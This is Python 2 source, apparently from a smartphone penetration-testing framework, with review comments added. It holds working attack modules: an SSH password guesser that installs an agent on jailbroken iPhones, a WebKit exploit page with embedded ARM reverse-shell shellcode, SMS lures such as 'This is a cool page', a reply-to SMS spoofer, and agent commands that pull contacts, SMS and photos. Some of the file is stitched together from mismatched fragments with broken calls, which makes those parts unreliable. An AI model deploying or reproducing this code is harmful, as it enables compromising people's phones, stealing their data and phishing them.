def guess_pass(passfile='', default=False, agent_location='./'): # Init Default Vars ipaddress = raw_input(color(33, '[*] IP address: ')) vulnerable = 'no' agent = 'no' command = 'sftp root@%s' % ipaddress timeout = 10 notfound = 'ssh: connect to host %s port 22: Connection refused' % ipaddress passwordstring = "root@%s's password: " % ipaddress putfile = agent_location agentfile = putfile.split('/')[-1] connectstring = 'Connecting to %s...' % ipaddress installcommand = 'dpkg -i %s' % agentfile guesspassword = '' passlist = ['alpine'] # Read passwords from file if not using default password if default == False: passfile = raw_input(color(33, '[*] Password File Location: ')) file = open(passfile, 'r') passlist = file.readlines() for guess in passlist: # Try to spawn an sftp session try: exp = pexpect.spawn(command) except Exception, e: print color(31, '[!] Cannot spawn sftp command: %s' % e) return 1 try: exp.expect(connectstring, timeout) exp.expect('Are you sure you want to continue connecting (yes/no)?', timeout) exp.sendline('yes') exp.expect(passwordstring,timeout) exp.sendline(guess) # If the sftp works, we know that the password was correct try: exp.expect('sftp>', timeout) vulnerable = 'yes' break except Exception, e: vulnerable = 'no' pass except Exception, e: # print '[!] Exception: %s' % e if str(e).__contains__('Connection refused') == True: print color(31, '[!] Exception: Connection Refused') if default == False: return 1 else: print color(31, '[!] Exception: %s' % e)
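def spf_db():
    '''Wrapper for MySQLdb.connect; rereads the SQL config vars on every call
    so edits to config.cfg take effect without restarting the framework.

    Returns the open connection, or None when the connect fails (the error is
    printed). Callers such as database_clear() compare the result with None
    and then call .cursor() on it, so the connection has to be handed back.
    '''
    config = ConfigParser.ConfigParser()
    config.read('config.cfg')
    # SQL config vars. The DB password lives in config.cfg in clear text, so
    # that file should be readable only by the operator account.
    sqlserver = config.get('SQL', 'server')
    username = config.get('SQL', 'username')
    password = config.get('SQL', 'password')
    try:
        db = MySQLdb.connect(sqlserver, username, password, 'framework')
    except Exception, e:
        print color(31, '[!] Error connecting to database: %s' % e)
        db = None
    # Without this the function always returned None and every caller's
    # db.cursor() blew up even when the connect succeeded.
    return db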
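def sshguess():
    '''Interactive front end for guess_pass(): prompt for the target IP and a
    password list, echo them back for confirmation, then run the guess.

    Returns guess_pass()'s return code, or 1 if the operator does not confirm.
    '''
    print 'This module attempts to guess the password for an Jailbroken iPhone on the local network by reading from a supplied password list\n'
    phoneipaddress = raw_input(color(33, '[+] IP address: '))
    passfile = raw_input(color(33, '[+] Password file: '))
    print color(33, '\n[*] IP Address: %s' % phoneipaddress)
    print color(33, '[*] Password file: %s' % passfile)
    correct = raw_input(color(31, '[+] Is this correct?(') + color(32, 'y') + color(31, '/') + color(32, 'N') + color(31, '): '))
    # str.split('') raises ValueError, so the original check could never pass.
    # Look at the first character only; an empty answer means the default, N.
    if correct.strip()[:1].lower() == 'y':
        # guess_pass(passfile='', default=False, agent_location='./') prompts
        # for the IP itself. Passing the address positionally put it into
        # `passfile` and turned `passfile` into a truthy `default`, which
        # silently reduced the run to the single built-in 'alpine' guess.
        return guess_pass(passfile=passfile)
    return 1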
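def agentcontrol_menu(key=None):
    '''Show the agent control menu and run the chosen command with `key`.

    key: the agent control key; prompted for when None. An empty or "none"
    answer aborts with return code 1, since every command needs the key to
    talk to the agent.
    Returns 0 for the exit entry (choice 0), the command's own return code
    for choices 1-5, and 1 for anything else (including menu()'s error value).
    '''
    if key is None:
        key = raw_input(color(33, '\n[-] Enter agent control key [None]: '))
    if isinstance(key, basestring):
        # NOTE(review): the key is lower-cased before use, as in the original;
        # if control keys are case-sensitive this mangles mixed-case keys.
        key = key.strip().lower()
    if key in ('', 'none', None):
        print color(31, '[!] No key was provided, communicating with an agent will not work')
        print color(31, '[!] Returning...')
        return 1

    menu_list = ['Send SMS', 'Take Picture', 'Get Contacts', 'Get SMS Database', 'Privilege Escalation']
    choice = menu(menu_list, color(35, '\n[*] Agent Control Commands:\n'))

    # Dispatch by value: the original compared with `is`, which only works for
    # ints by accident of CPython's small-int cache.
    commands = {
        1: send_sms,
        2: take_picture,
        3: get_contacts,
        4: get_sms_database,
        5: privilege_escalation,
        # add new modules here: N: custom_module
    }
    if choice == 0:
        return 0
    handler = commands.get(choice)
    if handler is None:
        return 1
    return handler(key)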
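def database_clear():
    '''Drop and recreate every SPF table (agents, data, modems, remote, client).

    Asks for confirmation first because this destroys all stored data.
    Returns 0 on success or when the operator cancels, and 1 when the
    database is unreachable or a DDL statement fails.
    '''
    ver = str(raw_input(str(color(31, "[!] This will destroy all your data! Are you sure you want to continue? (") + color(32, 'y') + color(31, '/') + color(32, 'N') + color(31, ') '))))
    # Anything that does not start with y/Y (including just Enter) is "no".
    if ver.strip()[:1].lower() != 'y':
        print color(31, '[!] Operation Cancelled')
        return 0

    db = spf_db()
    if db is None:
        # spf_db() has already printed the connection error. The original
        # announced "Creating it" but only carried a commented-out
        # `mysqladmin ... -p <password>` call, which would also have exposed
        # the DB password on the command line; schema creation is left to the
        # operator.
        print color(31, "[!] Could not connect to the 'framework' database; create it (and the user in config.cfg) before running this.")
        return 1

    # Table names and DDL are fixed strings, so plain formatting is safe here.
    tables = [
        ('agents',
         "create table agents ("
         "id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"
         "number varchar(12),"
         "path varchar(1000),"
         "controlkey varchar(7),"
         "controlnumber varchar(12),"
         "platform varchar(12))"),
        ('data',
         "create table data ("
         "id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"
         "sms varchar(2000),"
         "contacts varchar(1000),"
         "picture varchar(100),"
         "root varchar(5))"),
        ('modems',
         "create table modems ("
         "id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"
         "number varchar(12),"
         "path varchar(1000),"
         "controlkey varchar(7),"
         "type varchar(3))"),
        ('remote',
         "create table remote ("
         "id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"
         "ip varchar(15),"
         "exploit varchar(200),"
         "vuln varchar(3),"
         "agent varchar(3))"),
        ('client',
         "create table client ("
         "id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,"
         "number varchar(12),"
         "exploit varchar(200),"
         "vuln varchar(3))"),
    ]

    cursor = db.cursor()
    try:
        # Drop everything first so a half-built schema is rebuilt from scratch.
        for name, _ in tables:
            cursor.execute('DROP TABLE IF EXISTS %s' % name)
        db.commit()
        for _, ddl in tables:
            cursor.execute(ddl)
        db.commit()
    except Exception, e:
        print color(31, '[!] Error executing clear and build commands: %s' % e)
        return 1
    finally:
        cursor.close()
    return 0


def database_add2(number, path, key, x):
    # Adds to a DB, need to figure out where this is used and clean it up
    # NOTE(review): the statement below is assembled by string formatting with
    # the caller's values wrapped in double quotes; any value containing `"`
    # breaks the statement, and a crafted one rewrites it (SQL injection).
    # The execute call is not visible in this view -- where it runs, switch
    # to cursor.execute(query_with_placeholders, (number, path, key, x)).
    db = spf_db()
    number = '"%s"' % str(number)
    path = '"%s"' % str(path)
    key = '"%s"' % str(key)
    x = '"%s"' % str(x)
    insertquery = 'INSERT INTO modems (id,number,path,controlkey,type) VALUES (DEFAULT,%s,%s,%s,%s)' % (number, path, key, x)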
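def client_side():
    '''Host the "CVE 2010-1759 Webkit Vuln Android" page, SMS its link to the
    target, and wait for the payload's connect-back.

    The page is written to <webserver><path><filename> under the web root and
    the link http://<ipaddress><path><filename> is sent through the selected
    modem (USB AT commands, or the SPF app's control file). The embedded
    payload connects back to Web/shellipaddress on port 12345 ("\\u3930" is
    0x3039 = 12345 in the JavaScript); a connection marks the number as
    vulnerable in the `client` table.

    Returns 0 when the run completes (vulnerable or not) or the operator picks
    the exit entry, 1 when no modem is available or an input is unusable.
    '''
    # TODO: fix a lot
    import os

    webserver = config.get("Web", "server")
    # ipaddress = config.get('Web', 'ipaddress')
    shellipaddress = config.get("Web", "shellipaddress")

    cs = ["CVE 2010-1759 Webkit Vuln Android"]
    choice = menu(cs)
    if choice in (0, "Error"):
        return 0
    if choice != 1:
        return 1

    path = str(raw_input(color(33, "[-] Hosting Path: ")))
    filename = str(raw_input(color(33, "[-] Filename: ")))
    ipaddress = str(raw_input(color(33, "[-] Local IP address: ")))
    number = str(raw_input(color(33, "[-] Phone Number to Attack: ")))
    # The number is spliced into an AT command line / the agent control file
    # and stored in the DB; keep it to dialling characters so a stray quote or
    # CR cannot break out of either.
    if not number or not all(ch in "+0123456789" for ch in number):
        print color(31, "[!] Phone number must contain only digits (optional leading +): %s" % number)
        return 1

    link = "http://%s%s%s" % (ipaddress, path, filename)
    fullpath = webserver + path
    sploitfile = "%s%s" % (fullpath, filename)

    # Connect-back address as little-endian 16-bit words in the "\uXXXX" form
    # the JavaScript expects (octet2 octet1, octet4 octet3). The original's
    # struct.pack("b", ...) + hex() raised TypeError (and "b" rejects octets
    # above 127).
    octets = shellipaddress.split(".")
    try:
        if len(octets) != 4:
            raise ValueError(shellipaddress)
        hex1, hex2, hex3, hex4 = ["%02x" % int(o) for o in octets]
    except ValueError:
        print color(31, "[!] Web/shellipaddress must be a dotted IPv4 address: %s" % shellipaddress)
        return 1

    # Create the hosting directory and page without a shell: the original ran
    # mkdir/touch/chmod through system() with the operator-typed path spliced
    # into the command line, and left the page world-writable (0777).
    if not os.path.isdir(fullpath):
        os.makedirs(fullpath)
    text = [
        "<html>\n",
        "<head>\n",
        "<script>\n",
        'var ip = unescape("\\u' + hex2 + hex1 + "\\u" + hex4 + hex3 + '");\n',
        'var port = unescape("\\u3930");\n',
        "function trigger()\n",
        "{\n",
        'var span = document.createElement("div");\n',
        'document.getElementById("BodyID").appendChild(span);\n',
        'span.innerHTML = -parseFloat("NAN(ffffe00572c60)");\n',
        "}\n",
        "function exploit()\n",
        "{\n",
        'var nop = unescape("\\u33bc\\u0057");\n',
        "do\n",
        "{\n",
        "nop+=nop;\n",
        "} while (nop.length<=0x1000);\n",
        'var scode = nop+unescape("\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002");\n',
        "scode += port;\n",
        "scode += ip;\n",
        'scode += unescape("\\u2000\\u2000");\n',
        "target = new Array();\n",
        "for(i = 0; i < 0x1000; i++)\n",
        "target[i] = scode;\n",
        "for (i = 0; i <= 0x1000; i++)\n",
        "{\n",
        'document.write(target[i]+"<i>");\n',
        "if (i>0x999)\n",
        "{\n",
        "trigger();\n",
        "}\n",
        "}\n",
        "}\n",
        "</script>\n",
        "</head>\n",
        '<body id="BodyID">\n',
        "Enjoy!\n",
        "<script>\n",
        "exploit();\n",
        "</script>\n",
        "</body>\n",
        "</html>\n",
    ]
    with open(sploitfile, "w") as page:
        page.writelines(text)
    # The web server only needs to read the page.
    os.chmod(sploitfile, 0o644)

    modem = get_modem()
    if modem == 0:
        print color(31, "\n[!] No modems found. Attach a modem to use this functionality\n")
        return 1

    # Read SQL vars from config
    sqlserver = config.get("SQL", "server")
    username = config.get("SQL", "username")
    password = config.get("SQL", "password")
    db = MySQLdb.connect(sqlserver, username, password, "framework")

    # db_exec_rows() takes a finished query string, so the modem id is
    # interpolated; int() keeps it to digits. (Assumes get_modem() returns the
    # numeric modems.id, which its `== 0` sentinel suggests -- confirm.)
    modem_id = int(modem)
    path2 = db_exec_rows("SELECT path from modems where id=%d" % modem_id)
    key2 = db_exec_rows("SELECT controlkey from modems where id=%d" % modem_id)
    modemtype2 = db_exec_rows("SELECT type from modems where id=%d" % modem_id)

    if modemtype2 == "usb":
        # Interface with USB modem: text-mode SMS (AT+CMGF=1).
        usb = serial.serialposix(port="/dev/ttyUSB2", baudrate=115200, bytesize=8, parity="N", stopbits=1)
        try:
            usb.write("ATZ\r\n")
            sleep(1)
            print read_modem(usb)
            sleep(1)
            usb.write("AT+CMGF=1\r\n")
            print read_modem(usb)
            sleep(1)
            usb.write('AT+CMGS="%s"\r\n' % number)
            print read_modem(usb)
            sleep(1)
            msg = "This is a cool page: %s" % link
            # The message body is terminated by Ctrl-Z (0x1a). The original
            # struct.pack("b", 26, msg) raised struct.error (two args for one
            # format code).
            usb.write(msg + chr(26))
            sleep(2)
            print read_modem(usb)
            sleep(1)
        finally:
            usb.close()
    elif modemtype2 == "app":
        # Interface with app-based modem: queue the SEND command in the
        # agent's control file under the web root.
        control = "%s%s/getfunc" % (webserver, path2)
        command2 = "%s SEND %s This is a cool page: %s" % (key2, number, link)
        with open(control, "w") as ctl:
            ctl.write(command2)

    # Wait for the payload to connect back. The Perl original this was ported
    # from used Timeout => 180 on the listener; without one this blocks forever.
    vulnerable = "no"
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.settimeout(180)
    try:
        listener.bind((str(shellipaddress), 12345))
        listener.listen(1)
        conn, _ = listener.accept()
        try:
            conn.settimeout(30)
            conn.sendall("/system/bin/id\n")
            print conn.recv(4096)
        finally:
            conn.close()
        vulnerable = "yes"
    except socket.timeout:
        print color(31, "[!] No connect-back received")
    except socket.error, e:
        print color(31, "[!] Listener error: %s" % e)
    finally:
        listener.close()

    print color(32, "\n[+] Vulnerable: %s\n" % vulnerable)

    # Parameterised insert: the original spliced the quoted values into the
    # statement text (SQL injection via the number) and never committed.
    cursor = db.cursor()
    try:
        cursor.execute(
            "INSERT INTO client (id,number,exploit,vuln) VALUES (DEFAULT,%s,%s,%s)",
            (number, "webkit", vulnerable),
        )
        db.commit()
    finally:
        cursor.close()
        db.close()
    return 0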
except Exception, e: vulnerable = 'no' pass except Exception, e: # print '[!] Exception: %s' % e if str(e).__contains__('Connection refused') == True: print color(31, '[!] Exception: Connection Refused') if default == False: return 1 else: print color(31, '[!] Exception: %s' % e) # Upload agent if vulnerable if vulnerable == 'yes': print color(32, '[+] PASSWORD FOUND: %s\n' % guess) guesspassword = guess exp.sendline('put %s' % putfile) exp.expect('sftp>', timeout) exp.sendline('bye') command2 = 'ssh' exp = pxpect.spawn(command2+param) exp.expect(passwordstring, timeout) exp.sendline(guess) exp.expect(['root']) exp.sendline(installcommand) exp.expect('Setting up com.bulbsecurity.tooltest (0.0.1-23) ...', timeout) exp.sendline('tooltest') try:
def sms_sender_spoof():
    '''Send an SMS in PDU mode (AT+CMGF=0) through a USB modem with a User Data
    Header that carries a spoofed reply address.

    Flow: prompt for target number, message text and spoofed reply-to; build
    the PDU (SMS-SUBMIT header 004100, semi-octet swapped target number with
    type-of-address 91, a UDH element built from the spoofed address, then
    the 7-bit packed user data); send it with AT+CMGS=<pdu length>.

    NOTE(review): several steps below cannot run as written -- see the inline
    notes. The module prints its own warning that it "isn't perfect yet".
    Returns 0 in every case.
    '''
    print color(
        33,
        "[*] This module allows you to spoof the Reply-to address on an SMS using the User Data Header (UDH).\n"
        + "[ ] This attack only works against iPhones.\n"
        + "[ ] Currently this attack requires a USB mobile modem and does not work with the SPF app.\n",
    )
    print color(35, "[*] Select a USB modem to use for the attack:\n")
    modem = get_usb_modem()
    # NOTE(review): `is 0` is an identity test; compare with == instead.
    if modem is 0:
        print color(31, "\nNo USB modems found. Attach a USB modem to use this functionality\n")
    else:
        print color(
            31,
            "[!] This functionality isn't perfect yet. "
            + "There is something is wrong with the fill bits on the UDH if it does not meet on a septet boundary.\n"
            + "[ ] The message will be mangled. To get it to work use a 4 digit spoofed number ie 1234 or 9999.\n",
        )
        numberattack = raw_input(color(33, "[+] Number to Attack: "))
        message = raw_input(color(33, "[+] Message: "))
        spoof = raw_input(color(33, "[+] Spoofed Reply-To Address: "))
        print color(33, "\n[*] Number to Attack: ") + color(31, "%s" % numberattack)
        print color(33, "[*] Message: ") + color(31, "%s" % message)
        print color(33, "[*] Spoofed Reply-To Address: ") + color(31, "%s" % spoof)
        correct = raw_input(
            color(35, "\n[*] Is this correct?(") + color(32, "y") + color(35, "/") + color(32, "N") + color(35, "): ")
        )
        # NOTE(review): correct[0] raises IndexError on an empty answer, and
        # `is "y"` is an identity test that may be False for an equal string.
        if correct[0].lower() is "y":
            # SMS-SUBMIT first octet + message reference + UDHI bit (hex).
            pdu = "004100"
            # ef: target number has an odd number of digits -> pad with F.
            ef = 0
            length = len(numberattack)
            if length % 2 is not 0:
                ef = 1
            attacklenhex = "%02x" % length
            pdu += attacklenhex
            # Semi-octet swap of the target number: digit pairs are reversed
            # ("1234" -> "2143"); an odd trailing digit gets an F nibble.
            scrambledattack = ""
            i = 0
            x = numberattack
            while i < (length - 2):
                sub = x[i + 1]
                scrambledattack += sub
                sub = x[i]
                scrambledattack += sub
                i += 2
            if ef is 1:
                scrambledattack += "F"
                sub = x[length - 1]
                scrambledattack += sub
            else:
                sub = x[i + 1]
                scrambledattack += sub
                sub = x[i]
                scrambledattack += sub
            # 91 = international type-of-address; 0000 = PID + DCS (7-bit).
            pdu = "%s91%s0000" % (pdu, scrambledattack)
            # Same semi-octet swap for the spoofed reply-to address.
            eff = 0
            length = len(spoof)
            if length % 2 != 0:
                eff = 1
            spooflenhex = "%02x" % length
            scrambledspoof = ""
            i = 0
            x = spoof
            while i < length - 2:
                sub = x[i + 1]
                scrambledspoof += sub
                sub = x[i]
                scrambledspoof += sub
                i += 2
            if eff is 1:
                scrambledspoof += "F"
                sub = x[length - 1]
                scrambledspoof += sub
            else:
                sub = x[i + 1]
                scrambledspoof += sub
                sub = x[i]
                scrambledspoof += sub
            # UDH information element: "22" is the element id (presumably the
            # reply-address element) followed by its length and the address.
            # Python 2 integer division is assumed throughout the / below.
            uhd = "%s91%s" % (spooflenhex, scrambledspoof)
            udhlen1 = len(uhd) / 2
            uhd = "220%s%s" % (udhlen1, uhd)
            udhlen2 = len(uhd) / 2
            # Fill bits so the user data after the UDH starts on a septet
            # boundary; the warning above says this is where mangling happens.
            more = ((udhlen2 + 1) * 8) % 7
            if more is not 0:
                more2 = "0" * (7 - more)
            else:
                more2 = ""
            uhdlenhex = "%02x" % udhlen2
            uhd = uhdlenhex + uhd
            bin = ""
            length = len(message)
            # NOTE(review): int(message, 2) only accepts a string of 0/1
            # digits, and struct.unpack needs a buffer, not an int -- this line
            # raises for any real message; the intent appears to be converting
            # the message to a bit string.
            bits = struct.unpack("B", int(message, 2))[0]
            bits = more2 + bits
            bitslength = len(bits) / 2
            octetlength = bitslength / 8
            # Drop the top bit of each 8-bit group to get 7-bit septets.
            # NOTE(review): str.split("") raises ValueError ("empty
            # separator"), and this loop never increments i (the `i += 1`
            # after usb.close() below looks like it belongs here).
            septets = ""
            i = 0
            while i < octetlength:
                start = i * 8
                octs = str(bits).split("")[start : start + 8]
                sept = octs.split("")[1 : 1 + 7]
                septets += sept
            septetlength = len(septets) / 7
            # 7-bit packing: each output octet takes `eat` low bits stolen from
            # the next septet and the remaining bits of the current one.
            eat = 1
            eaten = 0
            ud = ""
            j = 0
            while j < (septetlength - 1):
                start = j * 7
                first = str(septets).split("")[start : start + (7 - eaten)]
                start2 = (j + 1) * 7
                second = str(septets).split("")[start2 : start2 + 7]
                food = 7 - eat
                stolen = second.split("")[food : food + eat]
                encode = stolen + first
                # NOTE(review): unpack("H") of a 1-byte pack("B") result
                # raises struct.error; a "%02x" of the int is presumably meant.
                hexy = struct.unpack("H", struct.pack("B", int(encode, 2)))
                eat += 1
                eat = eat % 8
                eaten += 1
                eaten = eaten % 8
                ud += hexy
                j += 1
            # Last septet: zero-fill to a whole octet.
            first = septets.split("")[((septetlength - 1) * 7) : ((septetlength - 1) * 7) + (7 - eaten)]
            fill = 1 + eaten
            zeros = "0" * fill
            encode = zeros + first
            hexy = struct.unpack("H", struct.pack("B", int(encode, 2)))
            ud += hexy
            ud = uhd + ud
            # UDL is counted in septets: octet count plus one per 7 octets.
            udlength = len(ud)
            udlength2 = udlength / 2
            extra = int(udlength2 / 7)
            udlength3 = udlength2 + extra
            udlenhex = "%02x" % udlength3
            pdu += udlenhex + ud
            # AT+CMGS length excludes the (empty, "00") SMSC field.
            pdulen = (len(pdu) / 2) - 1
            usb = serial.serialposix(port="/dev/ttyUSB2", baudrate=115200, bytesize=8, parity="N", stopbits=1)
            usb.write("ATZ\r\n")
            sleep(1)
            line = read_modem(usb)
            print line
            sleep(1)
            usb.write("AT+CMGF=0\r\n")
            line = read_modem(usb)
            print line
            sleep(1)
            usb.write("AT+CMGS=%s\r\n" % pdulen)
            # usb.write("AT+CMGS=27\r\n")
            line = read_modem(usb)
            print line
            sleep(1)
            msg = pdu
            # msg = "0041000B916110831316F900000F0A22080B915117344588F142A701"
            # NOTE(review): str has no .pack(); the PDU should be sent as
            # msg + chr(26) (Ctrl-Z terminator).
            usb.write(msg.pack("b", 26))
            sleep(10)
            line = read_modem(usb)
            print line
            usb.close()
            i += 1
    return 0
def alpine():
    '''Run the "Guess Password" module with only the built-in default
    password (guess_pass(default=True)).

    Returns guess_pass()'s return code unchanged.
    '''
    print color(33, '[*] Executing the "Guess Password" module with default password')
    return guess_pass(default=True)
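def direct_download():
    '''Host the Android agent under the web root and SMS the target a link
    to download and install it directly.

    The agent file at the module-level `location` is copied to
    <webserver><path><filename> and the link http://<ipaddress><path><filename>
    is sent via the selected modem (USB AT commands, or the SPF app control
    file). Only Android is supported.
    Returns 0 in every case, including when no modem is attached or the
    phone number is rejected.
    '''
    # TODO: cleanup
    import os
    import shutil

    global location  # Android agent location (module level)

    webserver = config.get('Web', 'server')
    ipaddress = config.get('Web', 'ipaddress')
    print color(35, '[*] This module sends an SMS with a link to directly download and install an Agent\n')
    print color(31, '[!] ONLY Android currently Supported')
    # platform = str(raw_input('Platform(Android/iPhone/Blackberry): '))
    platform = 'android'

    path = str(raw_input(color(33, '[-] Hosting Path: ')))
    filename = str(raw_input(color(33, '[-] Filename: ')))
    number = str(raw_input(color(33, '[-] Phone Number to Attack: ')))
    # The number goes into an AT command line / the agent control file; keep
    # it to dialling characters so a stray quote or CR cannot break out.
    if not number or not all(ch in '+0123456789' for ch in number):
        print color(31, '[!] Phone number must contain only digits (optional leading +): %s' % number)
        return 0

    if platform.lower() != 'android':
        return 0

    link = 'http://%s%s%s' % (ipaddress, path, filename)
    fullpath = '%s%s' % (webserver, path)
    # Create the hosting directory and copy the agent without a shell: the
    # original passed the operator-typed path through system("mkdir ...") and
    # system("cp ..."), where a space or metacharacter changed the command.
    if not os.path.isdir(fullpath):
        os.makedirs(fullpath)
    shutil.copy(location, '%s%s%s' % (webserver, path, filename))

    modem = get_modem()
    if modem == 0:
        print color(31, '\n[!] No modems found. Attach a modem to use this functionality\n')
        return 0

    # db_exec_rows() takes a finished query string, so the modem id is
    # interpolated; int() keeps it to digits. (Assumes get_modem() returns the
    # numeric modems.id, which its `== 0` sentinel suggests -- confirm.)
    modem_id = int(modem)
    path2 = db_exec_rows("SELECT path from modems where id=%d" % modem_id)
    key2 = db_exec_rows("SELECT controlkey from modems where id=%d" % modem_id)
    modemtype2 = db_exec_rows("SELECT type from modems where id=%d" % modem_id)

    if modemtype2 == 'usb':
        # USB modem: text-mode SMS (AT+CMGF=1).
        usb = serial.serialposix(port='/dev/ttyUSB2', baudrate=115200, bytesize=8, parity='N', stopbits=1)
        try:
            usb.write('ATZ\r\n')
            sleep(1)
            print read_modem(usb)
            sleep(1)
            usb.write('AT+CMGF=1\r\n')
            print read_modem(usb)
            sleep(1)
            usb.write('AT+CMGS="%s"\r\n' % number)
            print read_modem(usb)
            sleep(1)
            msg = 'This is a cool app: %s' % link
            # Message body terminated by Ctrl-Z (0x1a); the original
            # struct.pack('b', 26, msg) raised struct.error.
            usb.write(msg + chr(26))
            sleep(5)
            print read_modem(usb)
            sleep(1)
        finally:
            usb.close()
    elif modemtype2 == 'app':
        # App-based modem: queue the SEND command in the agent's control file.
        control = '%s%s/getfunc' % (webserver, path2)
        command2 = '%s SEND %s This is a cool app: %s' % (key2, number, link)
        with open(control, 'w') as ctl:
            ctl.write(command2)
    return 0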